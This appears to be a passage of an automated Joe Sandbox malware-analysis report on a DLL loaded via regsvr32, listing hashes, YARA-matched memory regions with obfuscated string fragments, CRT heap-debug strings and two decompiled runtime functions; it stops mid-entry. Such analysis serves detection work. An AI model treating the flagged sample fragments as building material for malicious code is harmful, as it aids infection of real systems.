                                    • Instruction Fuzzy Hash: 27421F31A0DB8585EBA08B69E88076EB7E0F785790F214136DADD83BB4DB7ED440CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                    • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                    • Client hook free failure., xrefs: 000007FEF9D254A0
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                    • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                    • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                    • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: HeapPointerValid_free_base
                                    • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                    • API String ID: 1656799702-182684663
                                    • Opcode ID: 5020832333ec35d85279f4adfeb03ce22c38d55cbbbf155ecd90f9052befc044
                                    • Instruction ID: a89e9ee482389454aa7ea2a98c74fcfc2c6f72e51cab5ee636fbf14708ed73c9
                                    • Opcode Fuzzy Hash: 5020832333ec35d85279f4adfeb03ce22c38d55cbbbf155ecd90f9052befc044
                                    • Instruction Fuzzy Hash: 51C17D36A18B4586EBA48B59E88076EB7E0F785790F614536EBCD43BB4DB7ED440CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                    • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                    • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                    • _1, xrefs: 000007FEF9D261FC
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                    • DAMAGED, xrefs: 000007FEF9D25E7D
                                    • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                    • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                    • API String ID: 0-510578482
                                    • Opcode ID: ecaeb8f0e9f50f2af9e26624824c00194ce636c943c5c9e443a2ba6a1604b1b7
                                    • Instruction ID: e4bd894b2b1f7b9ef1ad6a2df7423bb6029b32d077619e3c403e9c7133be1b2d
                                    • Opcode Fuzzy Hash: ecaeb8f0e9f50f2af9e26624824c00194ce636c943c5c9e443a2ba6a1604b1b7
                                    • Instruction Fuzzy Hash: EDE14F36A1CB5586EBA4CB69E88072EB7E0F384754F614526EACD43BB4DB7ED051CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 57%
                                    			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
                                    				void* _t7;
                                    				void* _t10;
                                    				signed long long _t15;
                                    				signed long long* _t16;
                                    				signed long long _t20;
                                    				signed long long _t24;
                                    
                                    				_t7 = __rcx -  *0xf9d4b018; // 0x6ec74913a662
                                    				if (_t7 != 0) goto 0xf9d2329a;
                                    				asm("dec eax");
                                    				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
                                    				asm("repe ret");
                                    				asm("dec eax");
                                    				goto 0xf9d23720;
                                    				asm("int3");
                                    				asm("int3");
                                    				asm("int3");
                                    				asm("int3");
                                    				asm("int3");
                                    				asm("int3");
                                    				asm("int3");
                                    				asm("o16 nop [eax+eax]");
                                    				if (__r8 - 8 < 0) goto 0xf9d2330c;
                                    				_t20 = __rdx * 0x1010101;
                                    				_t10 = __r8 - 0x40;
                                    				if (_t10 < 0) goto 0xf9d232ee;
                                    				_t15 =  ~__rcx;
                                    				if (_t10 == 0) goto 0xf9d232de;
                                    				 *__rcx = _t20;
                                    				_t16 = _t15 + __rcx;
                                    				if (_t10 != 0) goto 0xf9d23327;
                                    				_t24 = __r8 - _t15 & 7;
                                    				if (_t10 == 0) goto 0xf9d2330c;
                                    				 *_t16 = _t20;
                                    				if (_t10 != 0) goto 0xf9d23300;
                                    				if (_t24 == 0) goto 0xf9d2331b;
                                    				_t16[1] = __edx & 0x000000ff;
                                    				if (_t24 - 1 != 0) goto 0xf9d23311;
                                    				return __eax;
                                    			}










                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                    • String ID:
                                    • API String ID: 3778485334-0
                                    • Opcode ID: b9a945e82b5db3173e30537439e0c8a0a2586c91a17b1594fbe54d080f64dea2
                                    • Instruction ID: 1cff5b4ce0ef1e4e3ef6199276dfa804718153c0ec8d85c09348b02a89a91835
                                    • Opcode Fuzzy Hash: b9a945e82b5db3173e30537439e0c8a0a2586c91a17b1594fbe54d080f64dea2
                                    • Instruction Fuzzy Hash: 0F31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !f3$/w 8$CZ&B$KE$XW]${H$~V$ehl
                                    • API String ID: 0-603092622
                                    • Opcode ID: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                    • Instruction ID: cfa183faa2580dac9c87674e45a13d453ed6874265d0529349a04ca9f57a85af
                                    • Opcode Fuzzy Hash: 1ed8f1f3fe5d83a620da9bed02dcbbab86e8a919e24c18f8a00020719e4cb4ac
                                    • Instruction Fuzzy Hash: 079206752047888BDBB8CF24D8897CE7BE1FB86354F10451DE94E8AA60DBB89744CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _unlock
                                    • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                    • API String ID: 2480363372-3680694803
                                    • Opcode ID: 20c9d93c7bd8e5bb28edf4ede7e61cb74df2466a6d8b2339d4d317b1b63016a2
                                    • Instruction ID: 043f5a1d32994ed4de3068b5f716ee40183123659e8364044ce03f87ba7bfcf6
                                    • Opcode Fuzzy Hash: 20c9d93c7bd8e5bb28edf4ede7e61cb74df2466a6d8b2339d4d317b1b63016a2
                                    • Instruction Fuzzy Hash: 6D510A31A096828AE7F48B68EC4576E73E4F395354F614135DADD83BB4DB3EE4448B01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #X$$3$1P$H<,D$I$e$e
                                    • API String ID: 0-63615268
                                    • Opcode ID: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                    • Instruction ID: 84603d17c853973844c2c43058df0d3f37fc759f8199a5ada31f3ca4409f6e56
                                    • Opcode Fuzzy Hash: f878a82ca4faae8fe20105a06ae6298662dc00276aeafef1a86afe3292831526
                                    • Instruction Fuzzy Hash: 64E2CF715046898BDBF9DF24C88A7DD3BA1BB44344FA0C119E88ECE291DF745A8DEB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $*TG$Ag9$N?$`S$jk7$yHb
                                    • API String ID: 0-938425255
                                    • Opcode ID: a8480cca88ee067c9f89c24fcf558755f915344c34e6418cf6ef844eb024a60c
                                    • Instruction ID: 9f34faa7130dc1dd87f506cddbfe67dee9fd1f9295814769d0e47bce79b2000f
                                    • Opcode Fuzzy Hash: a8480cca88ee067c9f89c24fcf558755f915344c34e6418cf6ef844eb024a60c
                                    • Instruction Fuzzy Hash: 6D62E371A0530CDFCB59DFA8D18A6DDBBF1FF48344F004119E84AA72A0D7B4991ACB89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #X$3A<7$B.$Jq^$eIas$p<c$~;-
                                    • API String ID: 0-2724674699
                                    • Opcode ID: c830ff2e536ec82d4aacd995a299ed7dc96ce275305048a2346641cb28e12bef
                                    • Instruction ID: 11eaaa9cd8c54950f626fcd1c6608fbf38bfda5f45ba0fc90d4db62925cbbc4d
                                    • Opcode Fuzzy Hash: c830ff2e536ec82d4aacd995a299ed7dc96ce275305048a2346641cb28e12bef
                                    • Instruction Fuzzy Hash: 4142EAB090438C8BCBB8DF64C8857DD7BF0FB48308F50852DEA1A9B251DBB05685CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 33%
                                    			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                    				intOrPtr _v4;
                                    				void* _v12;
                                    				signed long long _v24;
                                    				signed int _v36;
                                    				long long _v180;
                                    				long long _v184;
                                    				intOrPtr _v192;
                                    				char _v196;
                                    				intOrPtr _v204;
                                    				long _v212;
                                    				long long _v220;
                                    				long long _v228;
                                    				long long _v1212;
                                    				long long _v1308;
                                    				char _v1460;
                                    				char _v1476;
                                    				char _v1484;
                                    				int _v1492;
                                    				long long _v1500;
                                    				long long _v1508;
                                    				long long _v1516;
                                    				long long _v1524;
                                    				long long _v1532;
                                    				long long _v1540;
                                    				void* _t51;
                                    				signed long long _t80;
                                    				long long _t85;
                                    				void* _t100;
                                    
                                    				_a24 = r8d;
                                    				_a16 = __edx;
                                    				_a8 = __ecx;
                                    				_t80 =  *0xf9d4b018; // 0x6ec74913a662
                                    				_v24 = _t80 ^ _t100 - 0x00000610;
                                    				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
                                    				E000007FE7FEF9D28D90(_t51, _a8);
                                    				_v184 = 0;
                                    				memset(__edi, 0, 0x94 << 0);
                                    				_v1508 =  &_v196;
                                    				_v1500 =  &_v1460;
                                    				_v1492 = 0;
                                    				_v212 = 0;
                                    				__imp__RtlCaptureContext();
                                    				_t85 = _v1212;
                                    				_v220 = _t85;
                                    				r8d = 0;
                                    				0xf9d40e28();
                                    				_v228 = _t85;
                                    				if (_v228 == 0) goto 0xf9d2bf64;
                                    				_v1516 = 0;
                                    				_v1524 =  &_v1476;
                                    				_v1532 =  &_v1484;
                                    				_v1540 =  &_v1460;
                                    				0xf9d40e22();
                                    				goto 0xf9d2bf84;
                                    				_v1212 = _v12;
                                    				_v1308 =  &_v12;
                                    				_v196 = _a4;
                                    				_v192 = _a12;
                                    				_v180 = _v12;
                                    				_v1492 = IsDebuggerPresent();
                                    				SetUnhandledExceptionFilter(??);
                                    				_v212 = UnhandledExceptionFilter(??);
                                    				if (_v212 != 0) goto 0xf9d2bffb;
                                    				if (_v1492 != 0) goto 0xf9d2bffb;
                                    				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
                                    				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                    • String ID:
                                    • API String ID: 1239891234-0
                                    • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                    • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                    • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                    • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                    • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                    • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                    • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                    • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Fg$UE;~$ibq$X$o
                                    • API String ID: 0-4038568857
                                    • Opcode ID: 478ae4c756925d4c0df58bf132ef81c61d708642842f5bb4a6db73d18922ca94
                                    • Instruction ID: c65d31d342ee38981127283826f07a965cef744f0e08d64225b30ad95669dc15
                                    • Opcode Fuzzy Hash: 478ae4c756925d4c0df58bf132ef81c61d708642842f5bb4a6db73d18922ca94
                                    • Instruction Fuzzy Hash: B0A2E9B1E0470C9FCB59CFA8E48A6DEBBF2FB48344F004119E906B7251D7B49919CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !g$!g$-{e$.9Y$7cm
                                    • API String ID: 0-3613756181
                                    • Opcode ID: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                    • Instruction ID: bf5508b14f48093895fd1996fdb0e85e6185e8dd26636c64e6a2ba956b5e503a
                                    • Opcode Fuzzy Hash: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                    • Instruction Fuzzy Hash: 409231711483CB8BCB78CF54C845BEEBBE1FB84704F10852CE86A8BA51E7B49649DB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Ol$`P$i($km}&$ttR
                                    • API String ID: 0-1254889785
                                    • Opcode ID: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                    • Instruction ID: 987162bd0b035dc474e6baf50d73a519649db35efcc54d1c771acda0ad58d409
                                    • Opcode Fuzzy Hash: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                    • Instruction Fuzzy Hash: 57422870908B488FD769CF79C48965EBBF1FB88748F204A1DE6A297271DB709845CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &JS$T'$T'$t7"$wHM
                                    • API String ID: 0-3882947952
                                    • Opcode ID: e1efb4f73683d5eb84ec2e51f9646df27f06f31a7415d6bac1a400d419ecf411
                                    • Instruction ID: 5dfe4264b2e9e46270ab4916ee937e41ce96fb3ef9e59635e1bc08d1b7ce1cf5
                                    • Opcode Fuzzy Hash: e1efb4f73683d5eb84ec2e51f9646df27f06f31a7415d6bac1a400d419ecf411
                                    • Instruction Fuzzy Hash: C6C1E3B150464DDFCB98CF28D1856DA7BE0FF48318F41822AFC0A9B264D774DA68DB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2T$=+%2$]|m$.s$9=
                                    • API String ID: 0-2491194820
                                    • Opcode ID: cf9153d85b611db8c4e34f9d3970acb18e39f17aceac1e5b04446b1241c988c8
                                    • Instruction ID: b22ad84dfc9a36729601f04a7d34ea20b01e779292d252d1f9b28ced5abbce67
                                    • Opcode Fuzzy Hash: cf9153d85b611db8c4e34f9d3970acb18e39f17aceac1e5b04446b1241c988c8
                                    • Instruction Fuzzy Hash: AE911570D0978C8FDB99DFE8D046BDEBBB2EB15348F40412DE44AAB298D774550ACB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <jG$PXf$]V.$fE$2>
                                    • API String ID: 0-2974598014
                                    • Opcode ID: bad49f1636925e4aa97c527113884a17b5682b6c71c0135986e4f76ada5c5575
                                    • Instruction ID: 93145a700ffc0e4eb939e50d890ad0ed9c26548b847d798d32bc26a6146f6c62
                                    • Opcode Fuzzy Hash: bad49f1636925e4aa97c527113884a17b5682b6c71c0135986e4f76ada5c5575
                                    • Instruction Fuzzy Hash: 3FA1E9716097C88FDBBADF68C84A7CB7BE4FB49704F50461DD88A8A250CBB45649CB42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -$<yH$`Zx$i,$i,
                                    • API String ID: 0-409805761
                                    • Opcode ID: f6182156d312c6874ac13020d1629895101c3b27d9b9d95c05b51086f9e303f4
                                    • Instruction ID: e265554e7eca7cf7370185f19b3f513919126148552d798dab9d7d185450bf95
                                    • Opcode Fuzzy Hash: f6182156d312c6874ac13020d1629895101c3b27d9b9d95c05b51086f9e303f4
                                    • Instruction Fuzzy Hash: 1F511D70E0470ECFCB59CFA8D4956EFBBB6EB44384F00816DD406A6290DB749B59CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: G$B$f F$p1
                                    • API String ID: 0-995880848
                                    • Opcode ID: f106650fdab1d10f8436c7cd336edd67fd48273b3da7da9a68bf46945136c829
                                    • Instruction ID: e5e766d75efbf2695ddd79b534cb997516972fc828d7cc42ecf8557e6a546d15
                                    • Opcode Fuzzy Hash: f106650fdab1d10f8436c7cd336edd67fd48273b3da7da9a68bf46945136c829
                                    • Instruction Fuzzy Hash: F972F87058478A8FDBB8DF24C8857EF7BA2FB84304F11852DE89A8B250DBB59655CF01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
